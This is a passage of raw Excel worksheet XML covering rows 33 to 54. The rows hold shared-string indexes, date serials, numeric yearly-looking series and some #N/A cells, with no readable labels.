      </c>
      <c r="F33" s="26">
        <v>101</v>
      </c>
      <c r="G33" s="1" t="s">
        <v>425</v>
      </c>
      <c r="H33" s="1" t="s">
        <v>426</v>
      </c>
      <c r="I33" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J33" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K33" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L33" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M33" s="1" t="s">
        <v>406</v>
      </c>
      <c r="N33" s="1" t="s">
        <v>407</v>
      </c>
      <c r="O33" s="1"/>
      <c r="P33" s="1"/>
      <c r="Q33" s="1" t="s">
        <v>3501</v>
      </c>
      <c r="R33" s="83">
        <v>368700</v>
      </c>
      <c r="S33" s="83">
        <v>538061</v>
      </c>
      <c r="T33" s="83">
        <v>711026</v>
      </c>
      <c r="U33" s="83">
        <v>763093</v>
      </c>
      <c r="V33" s="83">
        <v>836492</v>
      </c>
      <c r="W33" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="34" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A34" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B34" s="51">
        <v>44415.434867094904</v>
      </c>
      <c r="C34" s="1" t="s">
        <v>423</v>
      </c>
      <c r="D34" s="43">
        <v>101</v>
      </c>
      <c r="E34" s="1" t="s">
        <v>428</v>
      </c>
      <c r="F34" s="26">
        <v>101</v>
      </c>
      <c r="G34" s="1" t="s">
        <v>429</v>
      </c>
      <c r="H34" s="1" t="s">
        <v>430</v>
      </c>
      <c r="I34" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J34" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K34" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L34" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M34" s="1" t="s">
        <v>406</v>
      </c>
      <c r="N34" s="1" t="s">
        <v>407</v>
      </c>
      <c r="O34" s="1"/>
      <c r="P34" s="1"/>
      <c r="Q34" s="1" t="s">
        <v>3501</v>
      </c>
      <c r="R34" s="83">
        <v>94559</v>
      </c>
      <c r="S34" s="83">
        <v>132745</v>
      </c>
      <c r="T34" s="83">
        <v>147349</v>
      </c>
      <c r="U34" s="83">
        <v>156828</v>
      </c>
      <c r="V34" s="83">
        <v>171153</v>
      </c>
      <c r="W34" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="35" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A35" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B35" s="51">
        <v>44415.434867118056</v>
      </c>
      <c r="C35" s="1" t="s">
        <v>423</v>
      </c>
      <c r="D35" s="43">
        <v>101</v>
      </c>
      <c r="E35" s="1" t="s">
        <v>431</v>
      </c>
      <c r="F35" s="26">
        <v>101</v>
      </c>
      <c r="G35" s="1" t="s">
        <v>432</v>
      </c>
      <c r="H35" s="1" t="s">
        <v>433</v>
      </c>
      <c r="I35" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J35" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K35" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L35" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M35" s="1" t="s">
        <v>406</v>
      </c>
      <c r="N35" s="1" t="s">
        <v>407</v>
      </c>
      <c r="O35" s="1"/>
      <c r="P35" s="1"/>
      <c r="Q35" s="1" t="s">
        <v>3501</v>
      </c>
      <c r="R35" s="83">
        <v>149028</v>
      </c>
      <c r="S35" s="83">
        <v>229099</v>
      </c>
      <c r="T35" s="83">
        <v>272763</v>
      </c>
      <c r="U35" s="83">
        <v>327707</v>
      </c>
      <c r="V35" s="83">
        <v>370283</v>
      </c>
      <c r="W35" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="36" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A36" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B36" s="51">
        <v>44510.422827465278</v>
      </c>
      <c r="C36" s="1" t="s">
        <v>434</v>
      </c>
      <c r="D36" s="43">
        <v>101</v>
      </c>
      <c r="E36" s="1" t="s">
        <v>435</v>
      </c>
      <c r="F36" s="26">
        <v>100</v>
      </c>
      <c r="G36" s="1" t="s">
        <v>436</v>
      </c>
      <c r="H36" s="1" t="s">
        <v>437</v>
      </c>
      <c r="I36" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J36" s="1" t="s">
        <v>438</v>
      </c>
      <c r="K36" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L36" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M36" s="1" t="s">
        <v>158</v>
      </c>
      <c r="N36" s="1"/>
      <c r="O36" s="1"/>
      <c r="P36" s="1"/>
      <c r="Q36" s="1" t="s">
        <v>3502</v>
      </c>
      <c r="R36" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S36" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T36" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U36" s="83">
        <v>73</v>
      </c>
      <c r="V36" s="83">
        <v>13435</v>
      </c>
      <c r="W36" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="37" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A37" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B37" s="51">
        <v>44510.422827442133</v>
      </c>
      <c r="C37" s="1" t="s">
        <v>434</v>
      </c>
      <c r="D37" s="43">
        <v>101</v>
      </c>
      <c r="E37" s="1" t="s">
        <v>440</v>
      </c>
      <c r="F37" s="26">
        <v>101</v>
      </c>
      <c r="G37" s="1" t="s">
        <v>441</v>
      </c>
      <c r="H37" s="1" t="s">
        <v>442</v>
      </c>
      <c r="I37" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J37" s="1" t="s">
        <v>438</v>
      </c>
      <c r="K37" s="3" t="s">
        <v>21</v>
      </c>
      <c r="L37" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M37" s="1" t="s">
        <v>158</v>
      </c>
      <c r="N37" s="3"/>
      <c r="O37" s="1"/>
      <c r="P37" s="1"/>
      <c r="Q37" s="1" t="s">
        <v>3502</v>
      </c>
      <c r="R37" s="83">
        <v>2980</v>
      </c>
      <c r="S37" s="83">
        <v>2782</v>
      </c>
      <c r="T37" s="83">
        <v>2423</v>
      </c>
      <c r="U37" s="83">
        <v>2123</v>
      </c>
      <c r="V37" s="83">
        <v>2366</v>
      </c>
      <c r="W37" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="38" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A38" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B38" s="51">
        <v>44510.422827476854</v>
      </c>
      <c r="C38" s="1" t="s">
        <v>434</v>
      </c>
      <c r="D38" s="43">
        <v>101</v>
      </c>
      <c r="E38" s="1" t="s">
        <v>443</v>
      </c>
      <c r="F38" s="26">
        <v>101</v>
      </c>
      <c r="G38" s="1" t="s">
        <v>444</v>
      </c>
      <c r="H38" s="1" t="s">
        <v>445</v>
      </c>
      <c r="I38" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J38" s="1" t="s">
        <v>438</v>
      </c>
      <c r="K38" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L38" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M38" s="1" t="s">
        <v>158</v>
      </c>
      <c r="N38" s="1"/>
      <c r="O38" s="1"/>
      <c r="P38" s="1"/>
      <c r="Q38" s="1" t="s">
        <v>3502</v>
      </c>
      <c r="R38" s="83">
        <v>2979</v>
      </c>
      <c r="S38" s="83">
        <v>2783</v>
      </c>
      <c r="T38" s="83">
        <v>2312</v>
      </c>
      <c r="U38" s="83">
        <v>2126</v>
      </c>
      <c r="V38" s="83">
        <v>2382</v>
      </c>
      <c r="W38" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="39" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A39" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B39" s="51">
        <v>44510.422827407405</v>
      </c>
      <c r="C39" s="1" t="s">
        <v>434</v>
      </c>
      <c r="D39" s="43">
        <v>101</v>
      </c>
      <c r="E39" s="1" t="s">
        <v>446</v>
      </c>
      <c r="F39" s="26">
        <v>101</v>
      </c>
      <c r="G39" s="1" t="s">
        <v>447</v>
      </c>
      <c r="H39" s="1" t="s">
        <v>448</v>
      </c>
      <c r="I39" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J39" s="1" t="s">
        <v>438</v>
      </c>
      <c r="K39" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L39" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M39" s="1" t="s">
        <v>158</v>
      </c>
      <c r="N39" s="1"/>
      <c r="O39" s="1"/>
      <c r="P39" s="1"/>
      <c r="Q39" s="1" t="s">
        <v>3502</v>
      </c>
      <c r="R39" s="83">
        <v>2982</v>
      </c>
      <c r="S39" s="83">
        <v>2777</v>
      </c>
      <c r="T39" s="83">
        <v>2430</v>
      </c>
      <c r="U39" s="83">
        <v>2128</v>
      </c>
      <c r="V39" s="83">
        <v>2373</v>
      </c>
      <c r="W39" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="40" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A40" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B40" s="51">
        <v>44510.422827453702</v>
      </c>
      <c r="C40" s="1" t="s">
        <v>434</v>
      </c>
      <c r="D40" s="43">
        <v>101</v>
      </c>
      <c r="E40" s="1" t="s">
        <v>449</v>
      </c>
      <c r="F40" s="26">
        <v>101</v>
      </c>
      <c r="G40" s="1" t="s">
        <v>450</v>
      </c>
      <c r="H40" s="1" t="s">
        <v>451</v>
      </c>
      <c r="I40" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J40" s="1" t="s">
        <v>438</v>
      </c>
      <c r="K40" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L40" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M40" s="1" t="s">
        <v>158</v>
      </c>
      <c r="N40" s="1"/>
      <c r="O40" s="1"/>
      <c r="P40" s="1"/>
      <c r="Q40" s="1" t="s">
        <v>3502</v>
      </c>
      <c r="R40" s="83">
        <v>2982</v>
      </c>
      <c r="S40" s="83">
        <v>2780</v>
      </c>
      <c r="T40" s="83">
        <v>2424</v>
      </c>
      <c r="U40" s="83">
        <v>2132</v>
      </c>
      <c r="V40" s="83">
        <v>2346</v>
      </c>
      <c r="W40" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="41" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A41" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B41" s="51">
        <v>44405.484184386572</v>
      </c>
      <c r="C41" s="1" t="s">
        <v>494</v>
      </c>
      <c r="D41" s="43">
        <v>101</v>
      </c>
      <c r="E41" s="1" t="s">
        <v>495</v>
      </c>
      <c r="F41" s="26">
        <v>101</v>
      </c>
      <c r="G41" s="1" t="s">
        <v>496</v>
      </c>
      <c r="H41" s="1" t="s">
        <v>497</v>
      </c>
      <c r="I41" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J41" s="1" t="s">
        <v>226</v>
      </c>
      <c r="K41" s="1" t="s">
        <v>27</v>
      </c>
      <c r="L41" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M41" s="1" t="s">
        <v>308</v>
      </c>
      <c r="N41" s="1" t="s">
        <v>309</v>
      </c>
      <c r="O41" s="1" t="s">
        <v>498</v>
      </c>
      <c r="P41" s="1"/>
      <c r="Q41" s="1" t="s">
        <v>3503</v>
      </c>
      <c r="R41" s="83">
        <v>132</v>
      </c>
      <c r="S41" s="83">
        <v>108</v>
      </c>
      <c r="T41" s="83">
        <v>49</v>
      </c>
      <c r="U41" s="83">
        <v>25490</v>
      </c>
      <c r="V41" s="83">
        <v>23469</v>
      </c>
      <c r="W41" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="42" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A42" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B42" s="51">
        <v>44078.504171817127</v>
      </c>
      <c r="C42" s="1" t="s">
        <v>468</v>
      </c>
      <c r="D42" s="43">
        <v>111</v>
      </c>
      <c r="E42" s="1" t="s">
        <v>500</v>
      </c>
      <c r="F42" s="26">
        <v>102</v>
      </c>
      <c r="G42" s="1" t="s">
        <v>501</v>
      </c>
      <c r="H42" s="1" t="s">
        <v>502</v>
      </c>
      <c r="I42" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J42" s="1" t="s">
        <v>226</v>
      </c>
      <c r="K42" s="1" t="s">
        <v>27</v>
      </c>
      <c r="L42" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M42" s="1" t="s">
        <v>308</v>
      </c>
      <c r="N42" s="1" t="s">
        <v>309</v>
      </c>
      <c r="O42" s="1" t="s">
        <v>503</v>
      </c>
      <c r="P42" s="1" t="s">
        <v>504</v>
      </c>
      <c r="Q42" s="1" t="s">
        <v>3504</v>
      </c>
      <c r="R42" s="83">
        <v>3959</v>
      </c>
      <c r="S42" s="83">
        <v>3054</v>
      </c>
      <c r="T42" s="83">
        <v>2848</v>
      </c>
      <c r="U42" s="83">
        <v>9892</v>
      </c>
      <c r="V42" s="83">
        <v>45574</v>
      </c>
      <c r="W42" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="43" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A43" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B43" s="51">
        <v>43984.696897152775</v>
      </c>
      <c r="C43" s="1" t="s">
        <v>468</v>
      </c>
      <c r="D43" s="43">
        <v>111</v>
      </c>
      <c r="E43" s="1" t="s">
        <v>506</v>
      </c>
      <c r="F43" s="26">
        <v>100</v>
      </c>
      <c r="G43" s="1" t="s">
        <v>507</v>
      </c>
      <c r="H43" s="1" t="s">
        <v>508</v>
      </c>
      <c r="I43" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J43" s="1" t="s">
        <v>438</v>
      </c>
      <c r="K43" s="1" t="s">
        <v>27</v>
      </c>
      <c r="L43" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M43" s="1" t="s">
        <v>509</v>
      </c>
      <c r="N43" s="1" t="s">
        <v>510</v>
      </c>
      <c r="O43" s="1" t="s">
        <v>511</v>
      </c>
      <c r="P43" s="1" t="s">
        <v>512</v>
      </c>
      <c r="Q43" s="1" t="s">
        <v>3504</v>
      </c>
      <c r="R43" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S43" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T43" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U43" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V43" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W43" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="44" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A44" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B44" s="51">
        <v>44433.528511863427</v>
      </c>
      <c r="C44" s="1" t="s">
        <v>518</v>
      </c>
      <c r="D44" s="43">
        <v>101</v>
      </c>
      <c r="E44" s="1" t="s">
        <v>519</v>
      </c>
      <c r="F44" s="26">
        <v>101</v>
      </c>
      <c r="G44" s="1" t="s">
        <v>520</v>
      </c>
      <c r="H44" s="1" t="s">
        <v>521</v>
      </c>
      <c r="I44" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J44" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K44" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L44" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M44" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N44" s="1" t="s">
        <v>522</v>
      </c>
      <c r="O44" s="1"/>
      <c r="P44" s="1"/>
      <c r="Q44" s="1" t="s">
        <v>523</v>
      </c>
      <c r="R44" s="83">
        <v>168</v>
      </c>
      <c r="S44" s="83">
        <v>210</v>
      </c>
      <c r="T44" s="83">
        <v>173</v>
      </c>
      <c r="U44" s="83">
        <v>376</v>
      </c>
      <c r="V44" s="83">
        <v>2432</v>
      </c>
      <c r="W44" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="45" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A45" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B45" s="51">
        <v>44121.405996990739</v>
      </c>
      <c r="C45" s="1" t="s">
        <v>532</v>
      </c>
      <c r="D45" s="43">
        <v>100</v>
      </c>
      <c r="E45" s="1" t="s">
        <v>533</v>
      </c>
      <c r="F45" s="26">
        <v>100</v>
      </c>
      <c r="G45" s="1" t="s">
        <v>534</v>
      </c>
      <c r="H45" s="1" t="s">
        <v>535</v>
      </c>
      <c r="I45" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J45" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K45" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L45" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M45" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N45" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O45" s="1" t="s">
        <v>536</v>
      </c>
      <c r="P45" s="1"/>
      <c r="Q45" s="1" t="s">
        <v>537</v>
      </c>
      <c r="R45" s="83">
        <v>38</v>
      </c>
      <c r="S45" s="83">
        <v>20</v>
      </c>
      <c r="T45" s="83">
        <v>45</v>
      </c>
      <c r="U45" s="83">
        <v>16</v>
      </c>
      <c r="V45" s="83">
        <v>10</v>
      </c>
      <c r="W45" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="46" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A46" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B46" s="51">
        <v>44428.640736527777</v>
      </c>
      <c r="C46" s="1" t="s">
        <v>538</v>
      </c>
      <c r="D46" s="43">
        <v>110</v>
      </c>
      <c r="E46" s="1" t="s">
        <v>539</v>
      </c>
      <c r="F46" s="26">
        <v>110</v>
      </c>
      <c r="G46" s="1" t="s">
        <v>540</v>
      </c>
      <c r="H46" s="1" t="s">
        <v>541</v>
      </c>
      <c r="I46" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J46" s="1" t="s">
        <v>542</v>
      </c>
      <c r="K46" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L46" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M46" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N46" s="1"/>
      <c r="O46" s="1"/>
      <c r="P46" s="1"/>
      <c r="Q46" s="1" t="s">
        <v>3505</v>
      </c>
      <c r="R46" s="83">
        <v>10152</v>
      </c>
      <c r="S46" s="83">
        <v>50987</v>
      </c>
      <c r="T46" s="83">
        <v>85928</v>
      </c>
      <c r="U46" s="83">
        <v>71603</v>
      </c>
      <c r="V46" s="83">
        <v>69343</v>
      </c>
      <c r="W46" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="47" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A47" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B47" s="51">
        <v>44495.711635706015</v>
      </c>
      <c r="C47" s="1" t="s">
        <v>551</v>
      </c>
      <c r="D47" s="43">
        <v>121</v>
      </c>
      <c r="E47" s="1" t="s">
        <v>552</v>
      </c>
      <c r="F47" s="26">
        <v>100</v>
      </c>
      <c r="G47" s="1" t="s">
        <v>553</v>
      </c>
      <c r="H47" s="1" t="s">
        <v>554</v>
      </c>
      <c r="I47" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J47" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K47" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L47" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M47" s="1" t="s">
        <v>236</v>
      </c>
      <c r="N47" s="1"/>
      <c r="O47" s="1" t="s">
        <v>555</v>
      </c>
      <c r="P47" s="1"/>
      <c r="Q47" s="1" t="s">
        <v>3506</v>
      </c>
      <c r="R47" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S47" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T47" s="83">
        <v>306</v>
      </c>
      <c r="U47" s="83">
        <v>59</v>
      </c>
      <c r="V47" s="83">
        <v>1639</v>
      </c>
      <c r="W47" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="48" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A48" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B48" s="51">
        <v>44495.71163568287</v>
      </c>
      <c r="C48" s="1" t="s">
        <v>551</v>
      </c>
      <c r="D48" s="43">
        <v>121</v>
      </c>
      <c r="E48" s="1" t="s">
        <v>557</v>
      </c>
      <c r="F48" s="26">
        <v>112</v>
      </c>
      <c r="G48" s="1" t="s">
        <v>558</v>
      </c>
      <c r="H48" s="1" t="s">
        <v>559</v>
      </c>
      <c r="I48" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J48" s="49" t="s">
        <v>236</v>
      </c>
      <c r="K48" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L48" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M48" s="1" t="s">
        <v>236</v>
      </c>
      <c r="N48" s="1"/>
      <c r="O48" s="1" t="s">
        <v>560</v>
      </c>
      <c r="P48" s="1"/>
      <c r="Q48" s="1" t="s">
        <v>3506</v>
      </c>
      <c r="R48" s="83">
        <v>15271</v>
      </c>
      <c r="S48" s="83">
        <v>16380</v>
      </c>
      <c r="T48" s="83">
        <v>19590</v>
      </c>
      <c r="U48" s="83">
        <v>14146</v>
      </c>
      <c r="V48" s="83">
        <v>38255</v>
      </c>
      <c r="W48" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="49" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A49" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B49" s="51">
        <v>44714.405140173614</v>
      </c>
      <c r="C49" s="1" t="s">
        <v>1050</v>
      </c>
      <c r="D49" s="26">
        <v>100</v>
      </c>
      <c r="E49" s="1" t="s">
        <v>1051</v>
      </c>
      <c r="F49" s="26">
        <v>100</v>
      </c>
      <c r="G49" s="57" t="s">
        <v>1052</v>
      </c>
      <c r="H49" s="1" t="s">
        <v>1053</v>
      </c>
      <c r="I49" s="1"/>
      <c r="J49" s="1"/>
      <c r="K49" s="1"/>
      <c r="L49" s="1"/>
      <c r="M49" s="1"/>
      <c r="N49" s="1"/>
      <c r="O49" s="1"/>
      <c r="P49" s="1"/>
      <c r="Q49" s="1" t="s">
        <v>3507</v>
      </c>
      <c r="R49" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S49" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T49" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U49" s="83">
        <v>6</v>
      </c>
      <c r="V49" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W49" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="50" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A50" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B50" s="51">
        <v>44449.5567537963</v>
      </c>
      <c r="C50" s="1" t="s">
        <v>1055</v>
      </c>
      <c r="D50" s="43">
        <v>111</v>
      </c>
      <c r="E50" s="1" t="s">
        <v>1056</v>
      </c>
      <c r="F50" s="26">
        <v>111</v>
      </c>
      <c r="G50" s="1" t="s">
        <v>1057</v>
      </c>
      <c r="H50" s="1" t="s">
        <v>1058</v>
      </c>
      <c r="I50" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J50" s="1" t="s">
        <v>566</v>
      </c>
      <c r="K50" s="1" t="s">
        <v>12</v>
      </c>
      <c r="L50" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M50" s="1" t="s">
        <v>622</v>
      </c>
      <c r="N50" s="1" t="s">
        <v>623</v>
      </c>
      <c r="O50" s="1" t="s">
        <v>1059</v>
      </c>
      <c r="P50" s="1"/>
      <c r="Q50" s="1" t="s">
        <v>3508</v>
      </c>
      <c r="R50" s="83">
        <v>2</v>
      </c>
      <c r="S50" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T50" s="83">
        <v>21669</v>
      </c>
      <c r="U50" s="83">
        <v>10135</v>
      </c>
      <c r="V50" s="83">
        <v>5891</v>
      </c>
      <c r="W50" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="51" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A51" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B51" s="51">
        <v>44704.690373680554</v>
      </c>
      <c r="C51" s="1" t="s">
        <v>1055</v>
      </c>
      <c r="D51" s="26">
        <v>200</v>
      </c>
      <c r="E51" s="1" t="s">
        <v>1056</v>
      </c>
      <c r="F51" s="26">
        <v>200</v>
      </c>
      <c r="G51" s="1" t="s">
        <v>1057</v>
      </c>
      <c r="H51" s="1" t="s">
        <v>1058</v>
      </c>
      <c r="I51" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J51" s="1" t="s">
        <v>566</v>
      </c>
      <c r="K51" s="1" t="s">
        <v>12</v>
      </c>
      <c r="L51" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M51" s="1" t="s">
        <v>622</v>
      </c>
      <c r="N51" s="1" t="s">
        <v>623</v>
      </c>
      <c r="O51" s="1" t="s">
        <v>1059</v>
      </c>
      <c r="P51" s="1"/>
      <c r="Q51" s="1" t="s">
        <v>3509</v>
      </c>
      <c r="R51" s="83">
        <v>2</v>
      </c>
      <c r="S51" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T51" s="83">
        <v>21669</v>
      </c>
      <c r="U51" s="83">
        <v>10135</v>
      </c>
      <c r="V51" s="83">
        <v>5891</v>
      </c>
      <c r="W51" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="52" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A52" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B52" s="51">
        <v>44443.409976168979</v>
      </c>
      <c r="C52" s="1" t="s">
        <v>1062</v>
      </c>
      <c r="D52" s="43">
        <v>120</v>
      </c>
      <c r="E52" s="1" t="s">
        <v>1063</v>
      </c>
      <c r="F52" s="26">
        <v>101</v>
      </c>
      <c r="G52" s="1" t="s">
        <v>1064</v>
      </c>
      <c r="H52" s="1" t="s">
        <v>1065</v>
      </c>
      <c r="I52" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J52" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K52" s="1" t="s">
        <v>575</v>
      </c>
      <c r="L52" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M52" s="1" t="s">
        <v>1066</v>
      </c>
      <c r="N52" s="1"/>
      <c r="O52" s="1" t="s">
        <v>1067</v>
      </c>
      <c r="P52" s="1"/>
      <c r="Q52" s="1" t="s">
        <v>3510</v>
      </c>
      <c r="R52" s="83">
        <v>15</v>
      </c>
      <c r="S52" s="83">
        <v>3</v>
      </c>
      <c r="T52" s="83">
        <v>21</v>
      </c>
      <c r="U52" s="83">
        <v>7</v>
      </c>
      <c r="V52" s="83">
        <v>19</v>
      </c>
      <c r="W52" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="53" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A53" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B53" s="51">
        <v>44446.776413738429</v>
      </c>
      <c r="C53" s="1" t="s">
        <v>1062</v>
      </c>
      <c r="D53" s="43">
        <v>120</v>
      </c>
      <c r="E53" s="1" t="s">
        <v>1069</v>
      </c>
      <c r="F53" s="26">
        <v>101</v>
      </c>
      <c r="G53" s="1" t="s">
        <v>1070</v>
      </c>
      <c r="H53" s="1" t="s">
        <v>1071</v>
      </c>
      <c r="I53" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J53" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K53" s="1" t="s">
        <v>575</v>
      </c>
      <c r="L53" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M53" s="1" t="s">
        <v>1066</v>
      </c>
      <c r="N53" s="1"/>
      <c r="O53" s="1"/>
      <c r="P53" s="1"/>
      <c r="Q53" s="1" t="s">
        <v>3510</v>
      </c>
      <c r="R53" s="83">
        <v>4966</v>
      </c>
      <c r="S53" s="83">
        <v>8674</v>
      </c>
      <c r="T53" s="83">
        <v>5118</v>
      </c>
      <c r="U53" s="83">
        <v>5397</v>
      </c>
      <c r="V53" s="83">
        <v>4035</v>
      </c>
      <c r="W53" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="54" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A54" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B54" s="51">
        <v>44446.77641377315</v>
      </c>
      <c r="C54" s="1" t="s">
        <v>1062</v>
      </c>
      <c r="D54" s="43">
        <v>120</v>
      </c>
      <c r="E54" s="1" t="s">
        <v>1072</v>
      </c>
      <c r="F54" s="26">
        <v>200</v>
      </c>
      <c r="G54" s="1" t="s">
        <v>1073</v>
      </c>
      <c r="H54" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I54" s="1" t="s">
        <v>179</v>
      </c>
      <c r="J54" s="1" t="s">
        <v>180</v>
      </c>
      <c r="K54" s="1" t="s">
        <v>575</v>
      </c>
      <c r="L54" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M54" s="1" t="s">
        <v>1066</v>
      </c>
      <c r="N54" s="1"/>
      <c r="O54" s="1"/>
      <c r="P54" s="1"/>
      <c r="Q54" s="1" t="s">
        <v>3510</v>
      </c>
